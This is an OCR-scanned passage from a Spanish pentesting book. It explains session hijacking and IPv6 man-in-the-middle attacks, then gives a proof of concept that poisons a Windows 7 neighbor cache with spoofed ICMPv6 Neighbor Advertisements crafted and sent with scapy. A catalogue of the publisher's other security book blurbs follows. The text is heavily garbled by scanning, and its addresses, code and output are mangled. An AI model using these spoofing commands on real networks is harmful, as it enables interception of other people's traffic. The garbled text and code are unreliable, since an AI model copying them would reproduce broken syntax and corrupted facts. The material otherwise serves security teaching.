de  transpose  hasta  el  de  aplicacion.  Su  veniente  mas  famosa  es  el  robo  de  sesion  en  el  protocolo 
H  l  TP,  graeias  a  la  interceptacidn  de  cookies  de  usuario, 

Este  ataque  se  apoya  en  Ml  I’M  para  conseguir  que  d  trafieo  eircule  a  traves  del  atacante,  una 
vez  que  esto  ese  ha  conseguido  se  fi  1  Ira  la  informacion  interesante  como  puede  ser  una  cookie.  El 
atacante  se  presentara  ante  el  servidor  con  la  cookie  de  usuario  correspond iente  a  la  victima,  por  lo 
que  podra  acceder  a  los  recursos  que  esta  estaba  utilizando  en  Internet. 


IPv6 

En  este  apartado  se  explican  los  ataques  basicos  en  ei  protocolo  de  red  IPv6.  En  primer  lugar  se 
hablara  del  ataque  neighbor  advertisement  spoofing  en  el  que  mediante  paquetes  ICMPvb  se  informa 
de  la  situacion  de  los  vecinos.  Existen  diferentes  tipos  de  paquetes  que  son: 

-  Router  solicitation. 

*  Router  advertisement. 

-  Neighbor  solicitation. 

-  Neighbor  advertisement 

-  Redirect. 

En  IPv6  no  existe  el  protocolo  ARP,  por  lo  que  como  se  menciond  anteriormeflte  los  equipos 
aprenden  sob  re  los  vecinos  gracias  a  !CMPv6.  Se  puede  utilizar,  como  se  realizaba  en  ARP,  anuncios 
y  cambios  dc  direcciones  fisicas  con  ICMPv6,  *  *1 

El  ataque  SLAAC  tiene  como  objetivo  enganar  a  un  equipo  que  se  conecta  a  la  red*  El  atacante  debe 
realizar  las  funcionalidades  de  router  y  disponer  de  dos  interfaces,  una  que  soporte  IPv6  solamente 
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y  otra  con  IPv4,  Los  si  stem  as  operativos  como  Microsoft  Windows  o  Mac  OS  A"  prefieren  utilizar 
el  protocolo  IPv6  en  una  red  siempre  y  cuando  sea  posible,  Ademas,  IPv6  esta  pensando  para 
configurarse  a!  m&ximo,  por  io  que  se  obtendra  automaticamente  informacion  del  router  falsa  q tie 
el  atacante  ha  preparado. 

Proof  Of  Concept:  Envcncnando  vecinos  con  ICMPv6 

En  esta  prueba  de  concepto  se  realizaria  un  Man  In  The  Middle  en  un  canal  de  comumcaci6n  local 
donde  solo  existe  el  protocolo  IPv6  para  comunicarse.  La  idea  es  muy  similar  a  como  ocurria  en  el 
protocolo  IPv4, 

El  escenario  es  el  siguiente: 

Existe  una  maquina  X  la  cual  quiere  eomunicarse  con  3a  maquina  Z, 

El  atacante  represents  la  maquina  Y. 

El  atacante  utilizara  el  protocolo  Neighbor  Advertisement  y  Neighbor  Discovery  para 
llevar  a  cabo  el  ataque. 

Cuando  el  equipo  X  quiera  eomunicarse  con  el  equipo  Z  necesitara  couocer  la  direction  ffsica  del 
equipo  Z.  Para  obtenerla  en  una  red  IPv6  utilizara  un  mensaje  ICMPv6  de  tipo  Neighbor  Solicitation 
a  una  direccion  IPv6  de  tipo  multicast.  En  esta  direccion  todos  los  nodes  de  la  red  escuchar&n  e 
intentaran  identificarse*  La  direccion  IPv6  tiene  el  siguiente  formato  “ffD2::  I  :ffXX:YYZZ’\  siendo 
XXV YZZ  los  ultimos  ires  bytes  de  la  direccion  IPv6  con  la  que  se  quiere  comunicar.  La  maquina  Z 
contests  a  la  maquina  X  con  un  mensaje  ICMPv6  de  tipo  Neighbor  Advertisement  donde  se  envia  la 
informacion  necesaria  para  la  eomumcacibn. 

Entendiendo  el  comportamiento,  similar  al  del  protocolo  ARP  en  redes  IPv4,  la  maquina  Y  realizara 
el  ataque  mediante  el  envio  de  mensajes  rCMPv6  de  tipo  Neighbor  Advertisement  mdicando  a  la 
victima  que  la  direccion  de  un  nodo  iegitimo  se  corresponde  con  la  del  atacante. 

No  existe  ningun  mecanismo  en  la  implementacion  de  IPv6  que  impida  que  el  atacante  pueda  enviar 
este  tipo  de  mensajes,  no  existe  la  autenticacion  en  este  protocolo,  Por  este  hecho,  despues  de  la 
reception  del  mensaje  malicioso  las  caches  de  la  maquina  X  y  Z  estaran  spoofeadas. 

Para  reaiizarel  enveneriamiento  de  la  tabla  de  vecinOs  que  tiene  un  equipo  se  utilizara  la  herramienta 
scapy.  con  la  que  se  pueden  generar  distintos  paquetes  segtin  quiera  configurer  el  atacante.  La 
versatilidad  y  llcxihi lidad  de  la  herramienta  es  enornie,  proporcionaiido  al  auditor  la  posibilidad  dc 
generar  cualquier  tipo  de  irafico.  configurando  incluso  el  numero  de  repeticiones  e  intervales  cn  los 
envfos  de  los  paquetes- 

La  victima  es  un  equipo  con  Microsoft  Windows  7  y  en  la  imagen  se  puede  visualizar  como  mediante 
la  ejecucion  de  la  instniccibn  netsh  interface  ipv6  show  neighbors  se  obtiene  la  tabla  de  vecinos,  es 
dccir,  las  direeciones  IPv6  asociadas  a  una  direccion  lisica.  En  oiras  palabras,  la  “tabla  de  vecinos" 
os  similar  a  la  tabla  ARP,  en  la  practiea  cs  el  equivalente. 
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C:\Use  i*33  sAilnin  is  t  pa  do  r >nets  h  interf  ace 

Interfaz  i:  Loopback  Pseudo  Intarf ace  1 

lOi  prcc  ion  do  Inter  not 

ipv6  thou  neighbors 

Dirncc  idn  fist  lea 

T  ipo 

h f  02 : s  c 
|ff02::i:S 

Interfax  13:  Cnnaxinn 

de  area  local*  6 

Pernananta 

Pernanente 

Pernanente 

Direction  de  Internet 

Direccion  fisica 

I  ipo 

ff 02 :  :I6 

255 .  255 .255.255  : 65535  Pernanente 

ff02::l:2 

Interfax  il =  Gcmexidn 

de  area  local 

255.255.255.255:65535  Pernanente 

Direction  die  Internet 

Direccion  Fisica 

I  ipo 

FF02= :2 

33-33  -06-00-  00-02 

Pe  mane  me 

Ff02: :c 

33-33-00  -00  B0-0C 

Pernanente 

Ff 02 : *16 

33-33-00-60-00-16 

Pernanente 

Ff 02: :1 :2 

33-33-00  Vi  1  00-02 

Pernanente 

Ff 02 : SI  :3 

33-33-00-01-00-03 

Pernanente 

33-33-ff-ea^aarBc . 

Pernanente 

Imager}  OfU3:  Consults  de  tabk  de  veeinos  en  Windows  7 \ 


Para  arrancar  scapy  sl  debt-  ejeeuiar  la  instruction  que  Neva  su  notnbre,  ta!  y  como  sc  puede 
visual  izar  en  la  iinageru 


Una  vcz  arrancado  ei  interpreter  sc  generara  el  paquete  por  capas*  para  que  sea  mas  intuitivo  se 
creara  ei  paquete  de  las  capas  inferiores,  {Ethernet)*  n  las  mas  alias,  final izando  el  paquete  en  la 
configuration  del  protocolo  lCMPv6. 


r'00i$kali:™#  scapy 

INFO :  Car.  t  Import  python  gnuplot  wrapper  .  Won't  be  able  to  plot, 

WARNING;  No  route  found  for  IPv6  destination  ::  [no  default  route?) 

Welcome  to  Stapy  (2.2.0) 

>»  Is  ( Ether) 

dst  :  OestMACField  -  (None) 

sre  :  Sou rceMACF ibid  =  (None) 

type  :  XShortEnumField  =  (0) 

>»  sther=[cther(dst-' 00 :00 ^27 :A4 :cd :2e '  . s rc=' 33 : 00 r 27 :f4:8e : If 1 ) ) 

>  ipv6=IPv6{snr=1 feBS: :a0S :27f 4 : fef4 :8el f ' ,dst=' feBQ:  :9fc :8a4 :52ea;gaQe ' 

r  v  i 

<eyboa  nd  Interrupt 

»>  ipv6=IPvG ( sre- ' feBG: :e3fl:37ff :fef4 ;8elf  ,dst^J  fe00: :9fc :Sa4 :52ea :aa0e ' ) 
»>  ne-ICMPv6ND_NA [ tgt=‘ feBG: :a00:27f f 1 fef4 :Be'lf  ,ft=Q  p  S=l] 

»>  lla&I CMPvBNDOptsDstLLAdo r(  Vladd r= ' G8 ;0G: 27 : f4 :Bo : 1 f 1 ] 

T rac aback  (most  recent  call  Iasi): 

Fllo  "<console>" ,  line  1,  in  module* 
toameError:  name  ' tCMPvfiNDOptsDstLLAddr’  is  not  defined 
»>  Ua=ICWPy6NOOptD5tLlAddr(llflddrs-08  :00^27;f4:Ba;lf '  ) 

>»  | _ _ _ 


I m agon  08.14:  Ocneracidn  paquete  IPv6  con  scapy, 


Una  vez  generado  el  paquete  se  puede  visualizar  un  resumen  de  este  y  repasar  que  la  configuracion 
es  cor  recta,  En  el  easo  de  las  directories  IPv6  se  debe  tener  claro  cual  es  la  que  se  quiere  spoofeav 
e  indicarlo  en  el  paquete  IPv6, 
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<  etn.ar/{pv6/nfl/l  Ifl)  .display! J 

##f[  Ethernet  ]#*# 

j  det=  0ai@3 :27: 

art-  &9;00;27!f4<B#:If 
type*  ft*06dd 

*m  jng  ]### 

vertien-  fi 
tea  0 

n-  a 

plftriza  Wane  , 

nh»  !CMPv6 
hlin-  255 

src=  Fa89:;a@G:27ff :feF4;8elt 
cfst=  feSS  :  :9fc  :8a4  :52esrfio0c 

###[  KNPv&  Neighbor  Discovery  -  Neighbor  Advertisement  ]### 

typfi=  Neighbor  Advertisement 
code-  Q 
cksum=  None 

a-  0 
5=  1 
0-  1 
res- 

tgt=  feflG: ;aa0;27ff ;fef4  :fioi f 

###[  ICHPvli  Neighbor  Discovery  Option  -  Destination  link-i.^yer  Address  ]### 

type-  2 
len=  1 

Uaddr-  3B:BQ;27 : fA 

sttndp [ at ne r  / i p v6/ n a / 1 !. a .  ifaee  =  'qihB  '  ,  1000=1,  lntar=5) _ 

Imagen  08.15;  Visual izaci6n  del  paqueie  genet-ado  y  envio  de  esie. 

Pnr  ultimo,  para  corn  probar  que  I  os  neighbor  advertisement  estan  Uegando  sc  realiza  una  captura 
con  Wireshark  en  el  equipo  de  la  vfetima,  y  se  puede  visualizar  como  el  paquete  generado  con scapy 
esta  Uegando  y  cngartando  a!  sistema  operativo. 


Imagen  OB.  16:  Neighbor  Advertisement  spoofeado  que  llega  a  la  vie  lima. 
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Saber  que  ha  pasado  en  un  sistema  es  una  pregunta  de  obiigada 
respuesLa  en  multiples  situaciones,  Un  ordenador  del  que  se 
sospecha  que  alguien  esla  Leniendo  aeeeso  al  mismo,  porque  se 
esti  diseminando  infonnacidn  que  solo  esti  almaeenada  en  el  un 
empleado  que  sospecha  que  alguien  esla  leyendole  sus  correos 
personates  o  una  organization  que  cree  estar  siendo  espiada  por  la 
competencia  son  situaciones  comunes  en  las  empresas. 

En  este  libro  se  describen  los  procesos  para  realizar  la  captura 
de  evidencias  en  sistemas  Windows,  desde  la  captura  de  datos 
almacenados,  hasta  la  extraction  de  elementos  volatiles  como 
fichefos  borrados,  ardiivos  impresos  o  datos  que  se  eneuentran  en 
la  RAM  de  un  sistema.  Todo  dla  acompanado  de  las  herramientas 
necesarias  para  que  un  tecnico  pueda  realizar  sus  investi  gad  ones. 
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El  final  del  aho  2007  fra  jo  consigo  la  neeesidad  de  reactivar 
las  initiatives  de  aplicaeion  de  la  normative  vigente  en  materia 
de  protection  de  datos  de  earacter  personal.  Desde  entonees  la 
actual  izaci6n  de  los  proyectos  en  curso  y  la  puesta  en  marc  ha 
de  otros  nuevos  han  constituido  una  prioridad  para  numerosas 
empresas  en  el  Estado  EspafioL  Sin  embargo  la  aplicacidn  de 
la  legislation  vigente  no  esta  siendo  ni  tan  general izada  ni  tan 
rigurosa  como  se  esperaba. 

La  lecture  y  eonsulta  de  este  libro  permitira  al  lector  aiejar  muchos 
de  los  “rniedos'  y  dudas  que  ahora  le  asaltan  respecto  de  la  i  OPD 
y  sti  nuevo  reglamento,  impidiendo  en  muchas  ocasiones  que 
empresas  y  organizaciones  se  encuentren  en  un  situation  legal 
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Forefront 

Threat  Management  Gateway 
TMG  2010 


Microsoft  Forefront  Threat  Management  Gateway  {TMG]  JO  10 
es  la  ultima  evolution  de  las  tecnologias  Firewall,  Servidor  VPN 
y  servidor  Cache  de  la  compaftia  Redmond.  Despues  de  liabei 
con  vend  do  a  muchos  con  los  resultados  de  MS  ISA  Server  2006 , 
esta  nueva  evolution  mejora  en  funcionamierito  y  en  earaeteristicas 
la  version  anterior. 

En  este  primer  libro  en  Castellano  dedieado  mtegramente  a  este 

IF 

producto  podra  aprender  como  instalarlo,  como  eonftgurarlo  en  la 
empresa  en  configuraciones  stand  alone  y  en  cluster  NLB ,  como 
eonfigurar  las  regias  de  seguridad,  los  servicios  N1S  que  hacen  uso 
de  la  tecnologia  GAPA  o  el  servieio  de  protection  continua  de  MS 
Forefront  Web  Protection  Serxhce,  entre  otras  much  as  ope  i  ones. 


Microsoft 

SharePomt  2010  Segm  idntl 


Microsoft  Share  Point  2010:  Seguhdad  es  un  libro  pensado  para 
aquellos  responsables  de  sistemas  o  seguridad,  Arquitectos  IT, 
Administradores  o  leenicos  que  deseen  conoce  como  Ibrtifiear  una 
arquitectura  Share  Point  Server  2010  o  Share  Point  Foundation 
2010 k  El  libro  recoge  desde  los  a  pan  ados  de  fortificacibn 
iniciales,  como  la  configiiraci6n  de  los  sistemas  de  autenticacidn 
y  autorizaeibn,  la  gestion  de  la  auditoria,  la  creacion  de  planes  de 
conti ii gencia,  la  copia  y  restauracion  de  dates,  !a  publication  de 
forma  segura  en  Internet  y  la  tdcnicas  de  pentesting  y/o  ataques 
a  servidores  Share  Point,  Un  libro  impreseindible  si  tiene  a  cargo 
una  solution  basada  en  estas  tecnologias. 

Ruben  Alonso  ha  side  premiado  per  Microsoft  como  MVP  en 
tecnologias  SharePoint. 


El  DNI  electronico  esta  entre  nosotros,  desde  hace  bastantc 
tiempo  pero,  desgrsciadamente,  el  uso  del  mismo  cn  su  faceta 
electrdnica  no  ha  despegado.  Todavia  son  pocas  las  empresas  y  los 
particu  lares  que  sac  an  pro  v  echo  de  las  func  ion  alidades  que  ofrece. 
En  este  libro  Fames  Sarwat ,  de  la  empresa  Smart  Access,  desgrana 
los  fiindanientos  tecnolbgicos  que  estan  tras  el,  y  muestra  como 
utili/ar  el  DNI-e  en  entomos  profesionales  y  particulars*  Desde 
autenticarse  en  los  sistemas  informAticos  de  una  empresa,  hasia 
desarrollar  aplicaeiones  que  saquen  partido  del  DNI-e. 

Fames  Sarwat  es  licenciado  en  Informatica  por  la  Universidad 
P oli  teen  ica  de  Madrid  y  soeio  fun  dad  or  y  director  de  Smart  Access 
Anleriormente  ejercib  como  Director  de  Consultoria  en  Microsoft 
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Hacking  con  buscadores: 
Google,  Bing  &  Shodan 
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Anuario  ilustrado  de  seguridad  inform atica,  anecdotas  y 
cntrevistas  exdusivas,*.  Casi  todo  lo  quo  ha  ocurrido  en  seguridad 
en  Ids  liltimos  doce  afios,  esta  dentro  de  "Una  at  ilia:  12  alias  de 
seguridad  Informatica 

Para  ceiehrar  I  os  doce  afios  ininterrumpidos  del  bolelin  Una  a! 
dUa  hemo®  realizado  un  recorrido  por  loda  una  decada  de  virus, 
vulnerabilidades,  fraudes,  alertas,  y  rellexiones  sobre  la  seguridad 
en  Internet.  Desde  una  perspectiva  amena  y  entretenida  y  con 
un  diseno  sencillo  y  directo.  Los  12  afios  de  Una  al  dia  sirven 
de  excusa  para  un  libro  que  esta  compuesto  por  material  nuevo, 
revisado  y  redactado  desde  la  perspectiva  del  tiempo.  Adernas  de 
las  entre vistas  exclusivas  y  las  anecdotas  propias  de  Hispasec. 


La  informacioti  cs  clave  en  la  preparation  de  un  test  de  penetracidn . 
Sin  el  la  no  es  posible  determ  inar  que  atacar  ni  como  hacerlo.  Y  los 
buseadores  se  han  convertido  en  herramientas  fundamentales  para 
la  mineria  de  dales  y  los  procesos  de  inteligencia.  Sin  embargo, 
pese  a  que  las  tec  me  as  de  Google  Hacking  1 1  even  afios  siendo 
utilizadas,  quiza  no  hayan  sidosiempre  bien  tratadas  ni  transmitidas 
al  publico.  Limitar.se  a  emplear  Google  Dorks  conocidos  o  a  usar 
herramientas  que  automatical  esta  tarea  es,  con  respecto  al  uso  de 
!os  buscadores,  lo  misrno  que  usar  una  herramienta  como  Nessns, 
o  quiza  el  autopwn  de  Me  ( as  pi  o  it.  y  pensar  que  se  esta  realizando 
un  test  de  penetraeidn.  Por  supuesto,  estas  herramientas  son  utiles, 
pero  se  debe  ir  mas  alia,  com  prouder  los  problemas  encontrados, 
ser  capaces  de  detectar  otros  nuevos...  y  eombinar  herramientas. 


En  este  libro  podra  very  eonocen  desde  la  experieneia  profesional 
en  el  mundo  del  e-crime,  como  se  organ izan  las  estafas,  que 
herramientas  se  utilizan  y  cuiles  son  los  mecanlsmos  existentes 
para  eonseguir  transformar  en  dinero  eontante,  el  capital  robado 
digitalmenie  a  traves  de  Internet  Un  texto  impreseindible  para 
conocer  a  lo  que  todos  nos  enfren  tamos  en  Internet  hoy  en  dfa  y 
as i  poder  tomar  las  medidas  de  seguridad  apropiadas, 

Dani  Creus  y  Mike!  Gastesi  lorman  parte  de  un  equipo 
multidisci  pi  inar  de  reconocidos  especial  istas  en  e-crime  y 
seguridad  en  S2!sec.  Entre  sus  funciones  destacan  las  tareas  de 
anal  Is  is  e  investigacion  de  tern  as  re  lac  ion  ados  eon  la  seguridad  y 
fraudes  electron] cos. 
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Hoy  en  dia  no  suftimos  las  mismas  amenazas  (ni  en  eantidad  m 
cn  calf  dad)  que  hace  algunos  aftos,  V  no  sabemos  eualcs  serin  I  os 
retos  del  maftatia.  Hoy  cl  problema  mas  grave  es  miligar  el  impacto 
causado  per  las  vulnerabilidades  en  el  software  y  la  complejidad 
de  los  programas,  Y  esc  no  se  consigue  eon  una  gufa  "tradicional” 


mueho  menos  si  se  perpetuan  las  recomendaciones  ‘'de  toda 
la  vida*'  como  “cortafiiegos^  '‘anti virus11  y  “sentido  comun'\ 


i, Aeaso  no  disponemos  de  otras  arrfias  mueho  mas  potentes?  No. 
Disponemos  de  las  herramientas  “tradicionales”  muy  mejoradas, 
cierto, pero  tambien  de  otras  lecnoiogias  avail zadas  para  mitigar  las 
amenazas,  El  problema  es  que  no  son  tan  conocidas  ni  simples.  Por 
tanto  es  necesario  leer  el  manual  de  instrucciones,  entenderlas...  y 
aprovecharlas... 


Vl  as  de  3  .000  mi  1 1  ones  de  usuarios  en  mas  de  200  paises  utilizamos 
diariamente  las  comunicaekmes  moviles  GSM/GPRS/UMTS 
(2G/3G)  para  llevar  a  cabo  conversaciones  y  transferencias  de 
dates.  Pern,  ;,son  seguras  estas  eornumeaciories?.  En  los  ultimos 
aftos  se  han  hecho  publicos  multiples  vulnerabilidades  y  ejemplos 
de  ataques  praeticos  contra  GSM/GPRS/UMTS  que  ban  puesio  en 
evideneia  que  no  podemos  simplemente  confiar  en  su  seguridad.# 

Desc ubra  en  este  libro  cuales  son  las  vulnerabilidades  y  los 
ataques  contra  GSM/GPRS/UMTS  (2G/3G)  y  el  estado  respecto  a 
la  ntieva  lecnologia  LTE,  comprenda  las  tecnicas  y  conocimientos 
que  subyaeen  tras  esos  ataques  y  conozca  que  puede  hacer  para 
proteger  sus  comunicaciones  moviles. 


Esqtiema  National  de  Segurtdad 
con  Microsoft 
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La  Admimstracion  Espahola  lidera  un  encomiable  esfuerzo  hacia 
el  Desarrollo  de  la  Sociedad  de  la  Informacion  en  Espafia,  asi 
como  en  el  uso  dptimo  de  las  tecnologias  de  la  Informacion  en  pro 
de  una  presiaeioii  de  servicios  mas  eficicntc  hacia  los  eiudadanos, 
Aunque  este  tipo  de  contenidos  no  siempre  son  faeiles  de  tratar 
sin  caer  en  un  cxcesivo  dogmatismo,  si  es  cierto  que  en  d  marco 
de  la  Ley  11/2007  del  22  de  Junio.  de  acceso  electronico  de  los 
ciudadanos  a  los  Servicios  Publicos,  se  an  unci  6  la  creacidn  de  los 
Lsquemas  Nacionales  de  Interoperabilidad  y  dc  Seguridad  con  la 
mission  de  garantizar  un  derecho  ciudadano,  lo  que  sin  duda  es  un 
relo  y  una  responsabilidad  de  prim  era  magnitud.  Este  manual  sine 
para  facilitar  a  los  responsables  de  seguridad  el  cumplim lento  de 
los  aspectos  tecnologicos  dcrivados  del  eumplimienlo  del  ENS. 


Ataques  en  redes  de  datos 
IPv4  e IPv6 
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No  es  de  extranar  que  los  programas  contcngan  I  alios,  errores, 
que,  bajo  determ inadas  circun  stand  as  los  hagan  funcionar  de 
forma  extrafta.  Que  Ios  conviertan  en  algo  para  lo  que  no  estaban 
disenados,  Aqui  es  donde  entran  en  juego  los  posibles  ataeanies. 
Pentesters,  auditores,,..  y  ciberdelincuentes.  Para  la  organizaddn, 
mejorque  sea  uno  de  los  primeros  que  unode  Ios  ultimos.  Pero  para 
la  aplicacion,  que  no  antra  en  valorar  mtenciones.  no  hay  difereneia 
enlre  ellos,  Simplemente.  son  usuarios  que  hablan  un  extrafio 
idioma  en  que  los  errores  se  de  north  nan  “vulnerabilidades”,  y  una 
aplicacidn  defectuosa  puede  tertninar  com  irtiendose,  por  ejemplo, 
en  una  interfaz  de  usuario  que  le  permits  interactuar  direetamente 
con  la  base  de  dates,  Y  basia  con  un  unico  error. 


Las  redes  de  datos  IP  hace  mucho  tiempo  que  gobieman  nucstras 
sociedades.  Einpresas,  gobiemos  y  sistemas  de  interaccion 
social  se  basan  en  redes  TCP/IP  Sin  embargo,  estas  redes  tienen 
vulnerabiiidades  que  pueden  ser  aprovechadas  por  un  ataeante 
para  robar  contrasefias,  capturar  conversaciones  de  voz,  mensajes 
de  correo  elcctrbnico  o  informacion  transmitlda  desde  servidores, 
En  este  libro  se  analizan  como  funcionan  los  ataques  de  man  in 
the  middle  en  redes  IPv4  o  I  Pv6n  como  por  medio  de  estos  ataques 
se  puede  crackear  una  conexion  VPN  PPTP  robar  la  conexion  de 
un  usuario  al  Active  Directory  o  como  su plantar  identifrcadores 
en  aplieaeiones  para  conseguir  perpetrar  una  intrusion  ademas  del 
ataque  SLAAC,  el  Hincionamiento  de  las  tecnkds  ARP-Spoofmg, 
Neighbor  Spoofing  en  I  Pv6,  etcetera. 


Hoy  dia  es  innegable  el  imparable  crecimiento  que  han  tenido  las 
tecnologias  de  los  dispositivos  moviles  en  los  ultimos  ahos.  El 
numero  de  smartphones,  tablets,  etc.  han  aumentado  de  manera 
exponencial.  Esto  ha  side  ask  hasta  tal  pimio  que  actualmenie 
esios  dispositivos  se  han  posidonado  como  tecnologias  de  maxima 
prioridad  para  muchas  empresas, 

Con  este  libro  se  pueden  adquirir  los  conocimientos  necesarios 
pam  desarrollar  aplieaeiones  en  tOS>  guiando  al  lector  para  que 
aprenda  a  utilizar  las  herramientas  y  tecnieas  has  leas  para  iniciarse 
en  d  mundo  IOS.  Se  pretende  scnlar  unas  bases,  de  manera  que  al 
finalizar  la  lectura.  el  lector  pueda  convertirse  en  desarrollador IOS 
V  enfrentarse  a  proyectos  de  este  sistema  operative  por  si  mismo. 
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Hoy  en  dla  !a  admin  Istracidn  de  los  sistemas  es  de  vital  importance 
cn  toda  emprcsa  modema.  PowerShell  ofrcce  al  administrador  la 
posibilidad  de  automati/ar  las  tarcas  cotidianas  proporeionando 
un  potente  lenguaje  de  scripting.  El  libro  esta  estructurudo  en 
distintas  temdticas,  que  ofrecen  al  lector  una  introduccidn  a  la 
interaccion  con  la  potente  Ifnea  de  comandos  de  Microsoft ,  las 
bases  y  pilares  para  el  dcsarrolio  de  potenles  scripts  seguros,  y  la 
gestion  de  productos  de  Microsoft  desde  PowerShell.  eomo  son 
Hyper-  V\  Active  Directory  ^  Share  Point.  SQL  Server  o  IIS.  Otro 
de  los  aspectos  a  tratar  es  la  seguridad.  El  enfoque  practico  del 
libro  ayuda  al  administrador,  a  entender  los  distintos  y  variados 
conceptos  que  ofrcce  Power  She  IL 
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Windows  Server  2012 
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Microsoft  Windows  Server  2012  ha  llegado  con  novedades  cuyo 
objetivo  es  simplificar  las,  cada  vez  mas,  comp  I  ej  as  tareas  de 
los  administradores  y  profesionales  IT.  En  el  presente  libro 
se  recogen  la  gran  mayorfa  de  dichas  novedades  entre  las  que 
destacan  la  version  3.0  de  Hyper- V\  el  servidor  de  virtualizacidn 
de  Microsoft,  el  almacenamiento  con  su  nuevo  sistema  dc  archives 
y  sus  propiedades,  las  mejoras  y  nuevas  caracteristicas  de  Active 
Directory i  DNS  y  DHC  P*  las  novedosas  form u las  de  despliegue 
eflciente,  la  ampliacidn  y  mejora  de  la  Unea  de  comandos 
Microsoft  Windows  PowerShell,  y  como  no,  la  seguridad,  un  pilar 
bAsieo  en  la  estmetura  dc  los  productos  Microsoft  La  idea  del  libro 
es  presen  tar  las  novedades  y  aliondar  en  los  conceptos  principales. 
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La  seguridad  de  la  informacion  es  uno  de  los  mercados  en  atige  en 
la  Informatica  hoy  en  dia.  Los  gobiernos  y  empresas  valoran  sus 
activos  por  lo  que  deben  prolegerlos  de  accesos  ilicitos  mediante 
el  uso  de  auditorial  que  proporcionen  un  status  de  seguridad  a 
nivel  organ izati vo,  El  pentesting  forma  parte  de  las  auditor ias 
de  seguridad  y  propordona  un  conjunto  de  pruebas  que  valoren 
el  estado  de  la  seguridad  de  la  organ izac ion  en  cicrtas  fuses. 
Metmploit  es  una  de  las  herramientas  mas  utilizadas  en  procesos 
de  pen  testing  ya  que  contempla  distintas  fascs  de  un  lest  de 
intrusion*  Con  el  presente  libro  se  pretende  oblener  una  vision 
global  de  las  fuses  en  las  que  Metusphit  puede  ofrecer  su  potencia 
y  flexibilidad  al  servieio  del  hacking  etico. 
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Mkrohistorias: 
aneedotas  y  curtosidades 
de  la  Informatica 

■  WMP  Tj.Siw.iI,* 

*TPlKWC#  Mt*  IW*lf 


I  rif o  rrnitjc*  64 


Hacker  Epico 


*1 


I  reform  at  ica 


^Sabias que  Steve  Jobs  le  llevo  en  persona  un  ordenador  Macintosh 
a  Yoko  Ono  y  tambien  a  Mick  Jagger?  ;,Y  que  Jay  Miner,  el  genio 
que  creb  el  Amiga  1000  tenia  una  perrita  que  tomaba  parte  en 
algunas  de  las  decisiones  de  diserto  de  este  ordenador?  (iO  que 
Xenix  fue  el  sistema  UNIX  mis  usado  en  Ids  NOs  en  ordenadores  y 
que  era  propiedad  de  Microsoft'? 

Estas  son  solo  algunas  de  las  historias  y  anecdotas  que  encontraras 
en  este  libro  de  Microhistorias,  Una  parte  important*:  de  las  cuales 
tienen  como  protagonista  a  I  os  miembros  de  Microsoft  y  d e  Apple* 

Historias  de  hackers*  phreakers,  programadores  y  disenadores 
cuya  constancia  y  sabiduria  nos  sirven  de  inspiration  y  de  ejemplo 
para  nuestros  proyectos  de  hoy  en  dia. 


Angel  Rios,  auditor  de  una  empresa  puntera  en  el  sector  de 
la  seguridad  informatica  se  prepara  para  acudir  a  una  cita  con 
Yolanda,  antigua  companera  de  class  de  la  que  siempre  ha  estado 
enamorado.  Sin  embargo,  el  la  no  esta  interesada  en  iniciar  una 
relation;  solo  quiere  que  fe  ayude  a  descifrar  un  tnisterioso 
arch i vo.  Angel  se  ve  envuelto  en  una  intriga  que  complicate  su 
vida  y  lo  expondra  a  un  grave  peligro.  unicamente  contara  con  sus 
conocimientos  de  hacking  y  el  apoyo  de  su  amigo  Marcos, 

Mezcla  de  no  vela  negra  y  manual  teenico,  este  libro  aspira 
a  entretener  e  inform ar  a  partes  iguales  sobre  un  mundo  tan 
apasionante  como  cs  d  de  la  seguridad  informatica.  Tecnicas  de 
hacking  web,  si  stem  as  y  analisis  to  re  use.  son  algunos  de  los  terrrns 
que  se  tratan  con  total  rigor  y  excelentemente  documentados. 


La  evolution  de  VoIP  ha  sido  considerable,  siendo  hoy  dia  una 
altemativa  muy  utilizada  como  solution  unica  de  telefonia  en 
mu  chi  simas  empresas,  Gracias  a  la  expansion  de  Internet  v 
a  las  redes  de  alta  velocidad,  llegara  un  momenta  en  el  que  las 
llneas  telefonicas  convencionales  scan  total  mente  sustitukias  por 
sisiemas  de  VoIP,  dado  el  ahorro  economico  no  solo  en  llamadas 
sino  tambien  en  infraestruetura, 

El  gran  problems  es  La  la  I  La  de  conciettciacidn  en  seguridad.  Las 
empresas  aprenden  de  los  errores  a  base  de  pagar  elevadas  fact  liras 
y  a  causa  de  sufrir  intrusiones  en  sus  sisteimas. 

Hste  libro  muestra  como  hacer  un  test  de  penetracion  en  un  sistema 
de  VoIP  asi  como  las  herramientas  mas  utilizadas  para  atacarlo* 
repasando  ademas  los  fallos  de  configuration  mas  cornu nes. 


War  dog  y  at  mundo 

IT-  M*ndiN 


Cifrado  dc  las,  comunicaciones  dtgU,i*e5 
De  la  cifra  classes  al  algoritmQ  RSA 

iHiiei*  HLiUi  mulia  c  Wiq*  liim.  Aijiili  w 


Rentes  ting  con  Kali 


^Has  pensaclo  alguna  vez  porque  cofio  el  informatico tiene  siempre 
osa  cara  de  orco?  £Por  que  siempre  esta  enfadado?  (lPor  que  no  se 
relaeiona  con  la  genie  de  la  oficina? 

Yo  te  lo  digo:  por  tu  culpa.  Por  vuestra  culpa,  Por  las  burradas 
que  haceis.  Porque  no  os  pod^is  estar  quieteeitos,  no,,,  Porque  ns 
Greets  que  el  informdtieo  tiene  la  solucidn  para  todo. 

Pasa,  pasa,  y  enterate  de  que  pasa  por  la  cabeza  de  Waning,  un 
admin  is  tradof  de  sistemus  renegade,  con  afan  de  venganza,  con 
maldad  y  con  mala  liostia. 

Wardogy  el  mundo  es  el  producto  de  anos  de  exposicion  a  (users 
doiados  de  eslupidez  toxica,  de  mala  baba  destilada  y  aeidez  de 
estomago.  Y  cafe  en  eantidades  malsanas. 


Actualmente,  el  mundo  de  las  aplicaciones  mdviles  es  uno  de  los 
sectores  que  mas  dinem  mueve  en  el  mere  ado  de  la  infonnatica. 
fener  conocimientos  de  programacidn  en  estas  plataformas 
moviles  es  una  garantfa  para  poder  encontrar  empleo  a  dia  de  hoy. 

“DesarroHo  de  aplicaciones  Andmid  seguras”  prclendc  inculear 
a  I  lector  una  base  sol  id  a  de  conocimientos  sobre  program  aci  on 
en  la  plataforma  m6vil  con  mayor  cuota  de  mercado  del  mundo: 
Android \  Mediante  tut  enfoque  eminentemente  practice*  el  libra 
guiara  al  lector  en  el  desarrollo  de  las  funcionaiidades  mas 
deman dadas  a  la  hora  de  desarrollar  una  aplicacidn  movil.  Ademas 
